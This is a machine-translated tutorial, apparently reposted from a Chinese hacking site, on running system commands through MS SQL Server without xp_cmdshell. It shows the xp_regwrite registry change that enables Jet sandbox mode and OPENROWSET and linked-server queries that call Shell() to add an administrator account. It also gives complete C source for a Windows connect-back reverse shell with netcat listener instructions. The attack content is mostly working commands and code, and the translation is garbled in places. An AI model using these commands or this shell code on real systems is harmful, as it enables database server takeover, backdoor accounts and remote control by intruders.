Without xp_cmdshell, execute the command _ Security tutorial

Source: Internet
Author: User
Tags ole sql using
Using Jet to execute shell commands is more economical than trying to recover xp_cmdshell, but you need to guess the system path
Nt/2k:x:\winnt\system32\
Xp/2003:x:\windows\system32\
Solution:
If you do not need RDS support, delete X:\Program Files\Common Files\system\msadc\msadcs.dll
Simply modifying the registry is not enough, as detailed below

Of course, in addition to ias.mdb this, there are other MDB files can also, as long as the file exists
There are two System32 under 2003: Ias.mdb and Dnary.mdb.
Other systems you can dir/a/s *.mdb look, if there are new discoveries, welcome to add

If there is a echo, you can see the execution return result, otherwise you need to determine the host OS type before you try
Of course, if the savage a little, four turn to do it again.

First, the Jet sandbox mode is turned on, and the registry implementation is modified by the extended stored procedure xp_regwrite, and the administrator modifies the reason why the registry cannot be prevented.
For security reasons, the default sandbox mode is not turned on, which is why you need to xp_regwrite, and xp_regwrite at least db_owner permissions, and for convenience, it is recommended that you use the sysadmin permission test:
EXEC master.. Xp_regwrite ' HKEY_LOCAL_MACHINE ', ' Software\microsoft\jet\4.0\engines ', ' SandboxMode ', ' REG_DWORD ', 1
Note:
0 prohibition Everything (default)
1 makes access accessible, but prohibits other
2 disables access, but enables other
3 Enable everything

In fact, there are db_owner permissions can be executed, but the execution of the following statement will have different requirements, can not be directly executed, as described in the following statement explained.

Then use Jet.oledb to execute system command, this only need%systemroot% Read permission, or relatively loose, so the harm is very high
For users with only db_owner privileges, it is necessary to establish a linked database to access, not to allow direct access, as to whether the success of access has not yet been tested. Interested can test their own, welcome to add.
MSDN says:
"Sp_addlinkedserver:execute permissions default to members of the sysadmin and setupadmin fixed server roles."
The actual discovery Sp_addlinkedserver/sp_addlinkedsrvlogin needs setupadmin permissions to execute, and db_owner has all the permissions of the database, theoretically should be successful.

Only commands used under sysadmin permissions are given here:
SELECT * FROM OPENROWSET (' microsoft.jet.oledb.4.0 ', ';d atabase=c:\winnt\system32\ias\ias.mdb ', ' Select Shell ' (" cmd.exe/c net user admin Admin1234/add ")"

Establish a linked database ' l0op8ack ' reference command:
EXEC sp_addlinkedserver ' l0op8ack ', ' OLE DB Provider for Jet ', ' microsoft.jet.oledb.4.0 ', ' c:\windows\system32\ias\ Ias.mdb '

Verify the screenshot below (WIN2003 SP1 installed MSSQL2K the test effect in the SP3 environment, using sysadmin permissions):


Report:
When you cannot connect to the database server (the database is generally not open to the public, but you can generally access it externally),
You can use the Bounce Dos shell way, and write to bind shell is also very easy, hehe!
====================== Cut here =======================
Name:win32 Connect back shell source code for NT/2K/XP/2003
COMPILE:CL win32cbsh.c (VC6)
Usage:
On your pc:nc-l-p {Listen Port}
On Vitim pc:win32cbsh {your IP} {listen port}
Warning:if there ' s no parameter specified, it'll cause "fatal error"
#include <winsock2.h>
#pragma comment (lib, "Ws2_32")
int main (int argc, char **argv)
{
Wsadata Wsadata;
SOCKET Hsocket;
Startupinfo si;
Process_information Pi;
struct sockaddr_in adik_sin;
memset (&adik_sin,0,sizeof (Adik_sin));
memset (&si,0,sizeof (SI));
WSAStartup (Makeword (2,0), &wsadata);
Hsocket=wsasocket (Af_inet,sock_stream,null,null,null,null);
Adik_sin.sin_family=af_inet;
Adik_sin.sin_port=htons (Atoi (argv[2));
ADIK_SIN.SIN_ADDR.S_ADDR=INET_ADDR (argv[1]);
if (0!=connect (hsocket, struct sockaddr*) &adik_sin,sizeof (adik_sin)) return-1;
Si.cb=sizeof (SI);
Si.dwflags=startf_usestdhandles;
si.hstdinput=si.hstdoutput=si.hstderror= (void *) Hsocket;
CreateProcess (NULL, "cmd.exe", NULL,NULL,1,NULL,NULL,NULL,&AMP;SI,&AMP;PI);
return 0;
}
This can be done in this way, but unfortunately, db_owner permissions are not sufficient and require at least sysadmin permissions or securityadmin+setupadmin permission combinations

sp_addlinkedserver requires sysadmin or setupadmin permissions
sp_addlinkedsrvlogin requires sysadmin or securityadmin permissions
The final discovery is that the SA or Setupadmin+securityadmin permission account will be used.
There is generally no administrator that sets the normal account permissions

Practicality is not strong, only as a learning summary bar

The approximate process is as follows, if it is not sysadmin, then the Ias.mdb permission validation will be wrong,
I tested the time to grant hacker this user setupadmin+securityadmin permission to use Ias.mdb failed
You need to find an MDB accessible to a typical user to:

EXEC sp_addlinkedserver ' l0op8ack ', ' jetoledb ', ' microsoft.jet.oledb.4.0 ', ' C:\winnt\system32\ias\ias.mdb ';
exec sp_addlinkedsrvlogin ' l0op8ack ', ' hacker ';--
SELECT * from OPENQUERY (l0op8ack, ' select Shell (cmd.exe/c net user) ');--
exec sp_droplinkedsrvlogin ' l0op8ack ', ' hacker ';--
exec sp_dropserver ' l0op8ack ';--
My sql2k SP3 inside Sp_addserverlogin to bring the user name, plus true/false are reported without this user error

Oh, but eventually failed.

The original process can also be injected, after hitting the SP there is no

Take a T-SQL Reference, which is actually two methods of T-SQL referencing heterogeneous OLE DB data sources
OpenRowset need SA permission, want to break through with sp_addlinkserver/openquery, finally found not successful
============================================
Distributed Query Architecture
Microsoft®sql server™2000 supports two methods of referencing heterogeneous OLE DB data Sources in Transact-SQL statements:

1) Linked server name
system stored procedures sp_addlinkedserver and sp_addlinkedsrvlogin are used to provide the server name for the OLE DB data source. You can use a four-part name to reference an object in a Transact-SQL statement to those linked servers. For example, if the name of the linked server DEPTSQLSRVR is defined with another copy of SQL Server 2000, the following statement refers to a table on that server:

SELECT * from DeptSQLSrvr.Northwind.dbo.Employees

You can also specify the name of the linked server in the OPENQUERY statement to open a rowset from the OLE DB data source. You can then refer to the rowset as a reference table in a Transact-SQL statement.

2) Special connector name
When a data source is rarely referenced, the OPENROWSET or OPENDATASOURCE function is specified with the information required to connect to the linked server. The rowset can then be referenced in Transact-SQL using the same method as the reference table:

SELECT *
From OPENROWSET (' microsoft.jet.oledb.4.0 ',
' C:\MSOffice\Access\Samples\Northwind.mdb '; ' Admin '; ';
Employees)

SQL Server 2000 uses OLE DB to communicate between the relational engine and the storage engine. The relational engine decomposes each Transact-SQL statement into a series of operations that are performed on a simple OLE DB rowset that is opened by the storage engine from the base table. This means that the relational engine can also open a simple OLE DB rowset on any OLE DB data source.
1.exec Master.. Xp_regwrite ' HKEY_LOCAL_MACHINE ', ' Software\microsoft\jet\4.0\engine\sandboxmode ', reg_dword,0 write a registry value, Open access sandbox mode. That is, functions that can be performed in a application.
2. Open an Access file with OpenRowset. There are 4 such files in the%windir%\system32\ias. Take it with you.
3. The functions performed are as follows
Function Shell (ByVal Command as String) as Long

This article comes from [BA degree space], the original link: http://www.8-du.net/Article/2008/0514/article_40240.html

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.